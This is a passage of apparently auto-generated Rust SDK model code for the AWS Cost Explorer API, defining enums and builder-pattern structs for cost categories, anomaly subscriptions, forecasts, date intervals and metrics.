Dimension::Tenancy => "TENANCY",
Dimension::UsageType => "USAGE_TYPE",
Dimension::UsageTypeGroup => "USAGE_TYPE_GROUP",
Dimension::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"AGREEMENT_END_DATE_TIME_AFTER",
"AGREEMENT_END_DATE_TIME_BEFORE",
"AZ",
"BILLING_ENTITY",
"CACHE_ENGINE",
"DATABASE_ENGINE",
"DEPLOYMENT_OPTION",
"INSTANCE_TYPE",
"INSTANCE_TYPE_FAMILY",
"LEGAL_ENTITY_NAME",
"LINKED_ACCOUNT",
"LINKED_ACCOUNT_NAME",
"OPERATING_SYSTEM",
"OPERATION",
"PAYMENT_OPTION",
"PLATFORM",
"PURCHASE_TYPE",
"RECORD_TYPE",
"REGION",
"RESERVATION_ID",
"RESOURCE_ID",
"RIGHTSIZING_TYPE",
"SAVINGS_PLANS_TYPE",
"SAVINGS_PLAN_ARN",
"SCOPE",
"SERVICE",
"SERVICE_CODE",
"SUBSCRIPTION_ID",
"TENANCY",
"USAGE_TYPE",
"USAGE_TYPE_GROUP",
]
}
}
impl AsRef<str> for Dimension {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The rule schema version in this particular Cost Category.</p>
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryRuleVersion {
CostCategoryExpressionV1,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryRuleVersion {
fn from(s: &str) -> Self {
match s {
"CostCategoryExpression.v1" => CostCategoryRuleVersion::CostCategoryExpressionV1,
other => CostCategoryRuleVersion::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryRuleVersion {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryRuleVersion::from(s))
}
}
impl CostCategoryRuleVersion {
pub fn as_str(&self) -> &str {
match self {
CostCategoryRuleVersion::CostCategoryExpressionV1 => "CostCategoryExpression.v1",
CostCategoryRuleVersion::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["CostCategoryExpression.v1"]
}
}
impl AsRef<str> for CostCategoryRuleVersion {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The recipient of <code>AnomalySubscription</code> notifications. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Subscriber {
/// <p>The email address or SNS Amazon Resource Name (ARN). This depends on the
/// <code>Type</code>. </p>
pub address: std::option::Option<std::string::String>,
/// <p>The notification delivery channel. </p>
pub r#type: std::option::Option<crate::model::SubscriberType>,
/// <p>Indicates if the subscriber accepts the notifications. </p>
pub status: std::option::Option<crate::model::SubscriberStatus>,
}
impl std::fmt::Debug for Subscriber {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Subscriber");
formatter.field("address", &self.address);
formatter.field("r#type", &self.r#type);
formatter.field("status", &self.status);
formatter.finish()
}
}
/// See [`Subscriber`](crate::model::Subscriber)
pub mod subscriber {
/// A builder for [`Subscriber`](crate::model::Subscriber)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) address: std::option::Option<std::string::String>,
pub(crate) r#type: std::option::Option<crate::model::SubscriberType>,
pub(crate) status: std::option::Option<crate::model::SubscriberStatus>,
}
impl Builder {
/// <p>The email address or SNS Amazon Resource Name (ARN). This depends on the
/// <code>Type</code>. </p>
pub fn address(mut self, input: impl Into<std::string::String>) -> Self {
self.address = Some(input.into());
self
}
pub fn set_address(mut self, input: std::option::Option<std::string::String>) -> Self {
self.address = input;
self
}
/// <p>The notification delivery channel. </p>
pub fn r#type(mut self, input: crate::model::SubscriberType) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::SubscriberType>,
) -> Self {
self.r#type = input;
self
}
/// <p>Indicates if the subscriber accepts the notifications. </p>
pub fn status(mut self, input: crate::model::SubscriberStatus) -> Self {
self.status = Some(input);
self
}
pub fn set_status(
mut self,
input: std::option::Option<crate::model::SubscriberStatus>,
) -> Self {
self.status = input;
self
}
/// Consumes the builder and constructs a [`Subscriber`](crate::model::Subscriber)
pub fn build(self) -> crate::model::Subscriber {
crate::model::Subscriber {
address: self.address,
r#type: self.r#type,
status: self.status,
}
}
}
}
impl Subscriber {
/// Creates a new builder-style object to manufacture [`Subscriber`](crate::model::Subscriber)
pub fn builder() -> crate::model::subscriber::Builder {
crate::model::subscriber::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum SubscriberStatus {
Confirmed,
Declined,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for SubscriberStatus {
fn from(s: &str) -> Self {
match s {
"CONFIRMED" => SubscriberStatus::Confirmed,
"DECLINED" => SubscriberStatus::Declined,
other => SubscriberStatus::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SubscriberStatus {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SubscriberStatus::from(s))
}
}
impl SubscriberStatus {
pub fn as_str(&self) -> &str {
match self {
SubscriberStatus::Confirmed => "CONFIRMED",
SubscriberStatus::Declined => "DECLINED",
SubscriberStatus::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["CONFIRMED", "DECLINED"]
}
}
impl AsRef<str> for SubscriberStatus {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum SubscriberType {
Email,
Sns,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for SubscriberType {
fn from(s: &str) -> Self {
match s {
"EMAIL" => SubscriberType::Email,
"SNS" => SubscriberType::Sns,
other => SubscriberType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for SubscriberType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(SubscriberType::from(s))
}
}
impl SubscriberType {
pub fn as_str(&self) -> &str {
match self {
SubscriberType::Email => "EMAIL",
SubscriberType::Sns => "SNS",
SubscriberType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["EMAIL", "SNS"]
}
}
impl AsRef<str> for SubscriberType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum AnomalySubscriptionFrequency {
Daily,
Immediate,
Weekly,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for AnomalySubscriptionFrequency {
fn from(s: &str) -> Self {
match s {
"DAILY" => AnomalySubscriptionFrequency::Daily,
"IMMEDIATE" => AnomalySubscriptionFrequency::Immediate,
"WEEKLY" => AnomalySubscriptionFrequency::Weekly,
other => AnomalySubscriptionFrequency::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for AnomalySubscriptionFrequency {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(AnomalySubscriptionFrequency::from(s))
}
}
impl AnomalySubscriptionFrequency {
pub fn as_str(&self) -> &str {
match self {
AnomalySubscriptionFrequency::Daily => "DAILY",
AnomalySubscriptionFrequency::Immediate => "IMMEDIATE",
AnomalySubscriptionFrequency::Weekly => "WEEKLY",
AnomalySubscriptionFrequency::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["DAILY", "IMMEDIATE", "WEEKLY"]
}
}
impl AsRef<str> for AnomalySubscriptionFrequency {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum AnomalyFeedbackType {
No,
PlannedActivity,
Yes,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for AnomalyFeedbackType {
fn from(s: &str) -> Self {
match s {
"NO" => AnomalyFeedbackType::No,
"PLANNED_ACTIVITY" => AnomalyFeedbackType::PlannedActivity,
"YES" => AnomalyFeedbackType::Yes,
other => AnomalyFeedbackType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for AnomalyFeedbackType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(AnomalyFeedbackType::from(s))
}
}
impl AnomalyFeedbackType {
pub fn as_str(&self) -> &str {
match self {
AnomalyFeedbackType::No => "NO",
AnomalyFeedbackType::PlannedActivity => "PLANNED_ACTIVITY",
AnomalyFeedbackType::Yes => "YES",
AnomalyFeedbackType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["NO", "PLANNED_ACTIVITY", "YES"]
}
}
impl AsRef<str> for AnomalyFeedbackType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>A reference to a Cost Category containing only enough information to identify the Cost
/// Category.</p>
/// <p>You can use this information to retrieve the full Cost Category information using
/// <code>DescribeCostCategory</code>.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryReference {
/// <p>The unique identifier for your Cost Category. </p>
pub cost_category_arn: std::option::Option<std::string::String>,
/// <p>The unique name of the Cost Category.</p>
pub name: std::option::Option<std::string::String>,
/// <p>The Cost Category's effective start date.</p>
pub effective_start: std::option::Option<std::string::String>,
/// <p>The Cost Category's effective end date.</p>
pub effective_end: std::option::Option<std::string::String>,
/// <p>The number of rules that are associated with a specific Cost Category. </p>
pub number_of_rules: i32,
/// <p>The list of processing statuses for Cost Management products for a specific cost
/// category. </p>
pub processing_status:
std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
/// <p>A list of unique cost category values in a specific cost category. </p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The
/// default value for the cost category.</p>
pub default_value: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategoryReference {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryReference");
formatter.field("cost_category_arn", &self.cost_category_arn);
formatter.field("name", &self.name);
formatter.field("effective_start", &self.effective_start);
formatter.field("effective_end", &self.effective_end);
formatter.field("number_of_rules", &self.number_of_rules);
formatter.field("processing_status", &self.processing_status);
formatter.field("values", &self.values);
formatter.field("default_value", &self.default_value);
formatter.finish()
}
}
/// See [`CostCategoryReference`](crate::model::CostCategoryReference)
pub mod cost_category_reference {
/// A builder for [`CostCategoryReference`](crate::model::CostCategoryReference)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) cost_category_arn: std::option::Option<std::string::String>,
pub(crate) name: std::option::Option<std::string::String>,
pub(crate) effective_start: std::option::Option<std::string::String>,
pub(crate) effective_end: std::option::Option<std::string::String>,
pub(crate) number_of_rules: std::option::Option<i32>,
pub(crate) processing_status:
std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) default_value: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The unique identifier for your Cost Category. </p>
pub fn cost_category_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.cost_category_arn = Some(input.into());
self
}
pub fn set_cost_category_arn(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.cost_category_arn = input;
self
}
/// <p>The unique name of the Cost Category.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// <p>The Cost Category's effective start date.</p>
pub fn effective_start(mut self, input: impl Into<std::string::String>) -> Self {
self.effective_start = Some(input.into());
self
}
pub fn set_effective_start(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.effective_start = input;
self
}
/// <p>The Cost Category's effective end date.</p>
pub fn effective_end(mut self, input: impl Into<std::string::String>) -> Self {
self.effective_end = Some(input.into());
self
}
pub fn set_effective_end(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.effective_end = input;
self
}
/// <p>The number of rules that are associated with a specific Cost Category. </p>
pub fn number_of_rules(mut self, input: i32) -> Self {
self.number_of_rules = Some(input);
self
}
pub fn set_number_of_rules(mut self, input: std::option::Option<i32>) -> Self {
self.number_of_rules = input;
self
}
pub fn processing_status(
mut self,
input: impl Into<crate::model::CostCategoryProcessingStatus>,
) -> Self {
let mut v = self.processing_status.unwrap_or_default();
v.push(input.into());
self.processing_status = Some(v);
self
}
pub fn set_processing_status(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
) -> Self {
self.processing_status = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
/// <p>The
/// default value for the cost category.</p>
pub fn default_value(mut self, input: impl Into<std::string::String>) -> Self {
self.default_value = Some(input.into());
self
}
pub fn set_default_value(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.default_value = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryReference`](crate::model::CostCategoryReference)
pub fn build(self) -> crate::model::CostCategoryReference {
crate::model::CostCategoryReference {
cost_category_arn: self.cost_category_arn,
name: self.name,
effective_start: self.effective_start,
effective_end: self.effective_end,
number_of_rules: self.number_of_rules.unwrap_or_default(),
processing_status: self.processing_status,
values: self.values,
default_value: self.default_value,
}
}
}
}
impl CostCategoryReference {
/// Creates a new builder-style object to manufacture [`CostCategoryReference`](crate::model::CostCategoryReference)
pub fn builder() -> crate::model::cost_category_reference::Builder {
crate::model::cost_category_reference::Builder::default()
}
}
/// <p>The list of processing statuses for Cost Management products for a specific cost
/// category. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryProcessingStatus {
/// <p>The Cost Management product name of the applied status. </p>
pub component: std::option::Option<crate::model::CostCategoryStatusComponent>,
/// <p>The process status for a specific cost category. </p>
pub status: std::option::Option<crate::model::CostCategoryStatus>,
}
impl std::fmt::Debug for CostCategoryProcessingStatus {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryProcessingStatus");
formatter.field("component", &self.component);
formatter.field("status", &self.status);
formatter.finish()
}
}
/// See [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
pub mod cost_category_processing_status {
/// A builder for [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) component: std::option::Option<crate::model::CostCategoryStatusComponent>,
pub(crate) status: std::option::Option<crate::model::CostCategoryStatus>,
}
impl Builder {
/// <p>The Cost Management product name of the applied status. </p>
pub fn component(mut self, input: crate::model::CostCategoryStatusComponent) -> Self {
self.component = Some(input);
self
}
pub fn set_component(
mut self,
input: std::option::Option<crate::model::CostCategoryStatusComponent>,
) -> Self {
self.component = input;
self
}
/// <p>The process status for a specific cost category. </p>
pub fn status(mut self, input: crate::model::CostCategoryStatus) -> Self {
self.status = Some(input);
self
}
pub fn set_status(
mut self,
input: std::option::Option<crate::model::CostCategoryStatus>,
) -> Self {
self.status = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
pub fn build(self) -> crate::model::CostCategoryProcessingStatus {
crate::model::CostCategoryProcessingStatus {
component: self.component,
status: self.status,
}
}
}
}
impl CostCategoryProcessingStatus {
/// Creates a new builder-style object to manufacture [`CostCategoryProcessingStatus`](crate::model::CostCategoryProcessingStatus)
pub fn builder() -> crate::model::cost_category_processing_status::Builder {
crate::model::cost_category_processing_status::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryStatus {
Applied,
Processing,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryStatus {
fn from(s: &str) -> Self {
match s {
"APPLIED" => CostCategoryStatus::Applied,
"PROCESSING" => CostCategoryStatus::Processing,
other => CostCategoryStatus::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryStatus {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryStatus::from(s))
}
}
impl CostCategoryStatus {
pub fn as_str(&self) -> &str {
match self {
CostCategoryStatus::Applied => "APPLIED",
CostCategoryStatus::Processing => "PROCESSING",
CostCategoryStatus::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["APPLIED", "PROCESSING"]
}
}
impl AsRef<str> for CostCategoryStatus {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryStatusComponent {
CostExplorer,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryStatusComponent {
fn from(s: &str) -> Self {
match s {
"COST_EXPLORER" => CostCategoryStatusComponent::CostExplorer,
other => CostCategoryStatusComponent::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryStatusComponent {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryStatusComponent::from(s))
}
}
impl CostCategoryStatusComponent {
pub fn as_str(&self) -> &str {
match self {
CostCategoryStatusComponent::CostExplorer => "COST_EXPLORER",
CostCategoryStatusComponent::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["COST_EXPLORER"]
}
}
impl AsRef<str> for CostCategoryStatusComponent {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The forecast that's created for your query.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ForecastResult {
/// <p>The period of time that the forecast covers.</p>
pub time_period: std::option::Option<crate::model::DateInterval>,
/// <p>The mean value of the forecast.</p>
pub mean_value: std::option::Option<std::string::String>,
/// <p>The lower limit for the prediction interval. </p>
pub prediction_interval_lower_bound: std::option::Option<std::string::String>,
/// <p>The upper limit for the prediction interval. </p>
pub prediction_interval_upper_bound: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ForecastResult {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ForecastResult");
formatter.field("time_period", &self.time_period);
formatter.field("mean_value", &self.mean_value);
formatter.field(
"prediction_interval_lower_bound",
&self.prediction_interval_lower_bound,
);
formatter.field(
"prediction_interval_upper_bound",
&self.prediction_interval_upper_bound,
);
formatter.finish()
}
}
/// See [`ForecastResult`](crate::model::ForecastResult)
pub mod forecast_result {
/// A builder for [`ForecastResult`](crate::model::ForecastResult)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) time_period: std::option::Option<crate::model::DateInterval>,
pub(crate) mean_value: std::option::Option<std::string::String>,
pub(crate) prediction_interval_lower_bound: std::option::Option<std::string::String>,
pub(crate) prediction_interval_upper_bound: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The period of time that the forecast covers.</p>
pub fn time_period(mut self, input: crate::model::DateInterval) -> Self {
self.time_period = Some(input);
self
}
pub fn set_time_period(
mut self,
input: std::option::Option<crate::model::DateInterval>,
) -> Self {
self.time_period = input;
self
}
/// <p>The mean value of the forecast.</p>
pub fn mean_value(mut self, input: impl Into<std::string::String>) -> Self {
self.mean_value = Some(input.into());
self
}
pub fn set_mean_value(mut self, input: std::option::Option<std::string::String>) -> Self {
self.mean_value = input;
self
}
/// <p>The lower limit for the prediction interval. </p>
pub fn prediction_interval_lower_bound(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.prediction_interval_lower_bound = Some(input.into());
self
}
pub fn set_prediction_interval_lower_bound(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.prediction_interval_lower_bound = input;
self
}
/// <p>The upper limit for the prediction interval. </p>
pub fn prediction_interval_upper_bound(
mut self,
input: impl Into<std::string::String>,
) -> Self {
self.prediction_interval_upper_bound = Some(input.into());
self
}
pub fn set_prediction_interval_upper_bound(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.prediction_interval_upper_bound = input;
self
}
/// Consumes the builder and constructs a [`ForecastResult`](crate::model::ForecastResult)
pub fn build(self) -> crate::model::ForecastResult {
crate::model::ForecastResult {
time_period: self.time_period,
mean_value: self.mean_value,
prediction_interval_lower_bound: self.prediction_interval_lower_bound,
prediction_interval_upper_bound: self.prediction_interval_upper_bound,
}
}
}
}
impl ForecastResult {
/// Creates a new builder-style object to manufacture [`ForecastResult`](crate::model::ForecastResult)
pub fn builder() -> crate::model::forecast_result::Builder {
crate::model::forecast_result::Builder::default()
}
}
/// <p>The time period of the request. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DateInterval {
/// <p>The beginning of the time period. The start date is inclusive. For example, if
/// <code>start</code> is <code>2017-01-01</code>, Amazon Web Services retrieves cost and
/// usage data starting at <code>2017-01-01</code> up to the end date. The start date must
/// be equal to or no later than the current date to avoid a validation error.</p>
pub start: std::option::Option<std::string::String>,
/// <p>The end of the time period. The end date is exclusive. For example, if
/// <code>end</code> is <code>2017-05-01</code>, Amazon Web Services retrieves cost and
/// usage data from the start date up to, but not including, <code>2017-05-01</code>.</p>
pub end: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for DateInterval {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DateInterval");
formatter.field("start", &self.start);
formatter.field("end", &self.end);
formatter.finish()
}
}
/// See [`DateInterval`](crate::model::DateInterval)
pub mod date_interval {
/// A builder for [`DateInterval`](crate::model::DateInterval)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) start: std::option::Option<std::string::String>,
pub(crate) end: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The beginning of the time period. The start date is inclusive. For example, if
/// <code>start</code> is <code>2017-01-01</code>, Amazon Web Services retrieves cost and
/// usage data starting at <code>2017-01-01</code> up to the end date. The start date must
/// be equal to or no later than the current date to avoid a validation error.</p>
pub fn start(mut self, input: impl Into<std::string::String>) -> Self {
self.start = Some(input.into());
self
}
pub fn set_start(mut self, input: std::option::Option<std::string::String>) -> Self {
self.start = input;
self
}
/// <p>The end of the time period. The end date is exclusive. For example, if
/// <code>end</code> is <code>2017-05-01</code>, Amazon Web Services retrieves cost and
/// usage data from the start date up to, but not including, <code>2017-05-01</code>.</p>
pub fn end(mut self, input: impl Into<std::string::String>) -> Self {
self.end = Some(input.into());
self
}
pub fn set_end(mut self, input: std::option::Option<std::string::String>) -> Self {
self.end = input;
self
}
/// Consumes the builder and constructs a [`DateInterval`](crate::model::DateInterval)
pub fn build(self) -> crate::model::DateInterval {
crate::model::DateInterval {
start: self.start,
end: self.end,
}
}
}
}
impl DateInterval {
/// Creates a new builder-style object to manufacture [`DateInterval`](crate::model::DateInterval)
pub fn builder() -> crate::model::date_interval::Builder {
crate::model::date_interval::Builder::default()
}
}
/// <p>The aggregated value for a metric.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct MetricValue {
/// <p>The actual number that represents the metric.</p>
pub amount: std::option::Option<std::string::String>,
/// <p>The unit that the metric is given in.</p>
pub unit: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for MetricValue {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("MetricValue");
formatter.field("amount", &self.amount);
formatter.field("unit", &self.unit);
formatter.finish()
}
}
/// See [`MetricValue`](crate::model::MetricValue)
pub mod metric_value {
/// A builder for [`MetricValue`](crate::model::MetricValue)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) amount: std::option::Option<std::string::String>,
pub(crate) unit: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The actual number that represents the metric.</p>
pub fn amount(mut self, input: impl Into<std::string::String>) -> Self {
self.amount = Some(input.into());
self
}
pub fn set_amount(mut self, input: std::option::Option<std::string::String>) -> Self {
self.amount = input;
self
}
/// <p>The unit that the metric is given in.</p>
pub fn unit(mut self, input: impl Into<std::string::String>) -> Self {
self.unit = Some(input.into());
self
}
pub fn set_unit(mut self, input: std::option::Option<std::string::String>) -> Self {
self.unit = input;
self
}
/// Consumes the builder and constructs a [`MetricValue`](crate::model::MetricValue)
pub fn build(self) -> crate::model::MetricValue {
crate::model::MetricValue {
amount: self.amount,
unit: self.unit,
}
}
}
}
impl MetricValue {
/// Creates a new builder-style object to manufacture [`MetricValue`](crate::model::MetricValue)
pub fn builder() -> crate::model::metric_value::Builder {
crate::model::metric_value::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum Granularity {
Daily,
Hourly,
Monthly,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for Granularity {
fn from(s: &str) -> Self {
match s {
"DAILY" => Granularity::Daily,
"HOURLY" => Granularity::Hourly,
"MONTHLY" => Granularity::Monthly,
other => Granularity::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for Granularity {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(Granularity::from(s))
}
}
impl Granularity {
pub fn as_str(&self) -> &str {
match self {
Granularity::Daily => "DAILY",
Granularity::Hourly => "HOURLY",
Granularity::Monthly => "MONTHLY",
Granularity::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["DAILY", "HOURLY", "MONTHLY"]
}
}
impl AsRef<str> for Granularity {
fn as_ref(&self) -> &str {
self.as_str()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum Metric {
AmortizedCost,
BlendedCost,
NetAmortizedCost,
NetUnblendedCost,
NormalizedUsageAmount,
UnblendedCost,
UsageQuantity,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for Metric {
fn from(s: &str) -> Self {
match s {
"AMORTIZED_COST" => Metric::AmortizedCost,
"BLENDED_COST" => Metric::BlendedCost,
"NET_AMORTIZED_COST" => Metric::NetAmortizedCost,
"NET_UNBLENDED_COST" => Metric::NetUnblendedCost,
"NORMALIZED_USAGE_AMOUNT" => Metric::NormalizedUsageAmount,
"UNBLENDED_COST" => Metric::UnblendedCost,
"USAGE_QUANTITY" => Metric::UsageQuantity,
other => Metric::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for Metric {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(Metric::from(s))
}
}
impl Metric {
pub fn as_str(&self) -> &str {
match self {
Metric::AmortizedCost => "AMORTIZED_COST",
Metric::BlendedCost => "BLENDED_COST",
Metric::NetAmortizedCost => "NET_AMORTIZED_COST",
Metric::NetUnblendedCost => "NET_UNBLENDED_COST",
Metric::NormalizedUsageAmount => "NORMALIZED_USAGE_AMOUNT",
Metric::UnblendedCost => "UNBLENDED_COST",
Metric::UsageQuantity => "USAGE_QUANTITY",
Metric::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"AMORTIZED_COST",
"BLENDED_COST",
"NET_AMORTIZED_COST",
"NET_UNBLENDED_COST",
"NORMALIZED_USAGE_AMOUNT",
"UNBLENDED_COST",
"USAGE_QUANTITY",
]
}
}
impl AsRef<str> for Metric {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The details of how to sort the data.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct SortDefinition {
/// <p>The key that's used to sort the data.</p>
pub key: std::option::Option<std::string::String>,
/// <p>The order that's used to sort the data.</p>
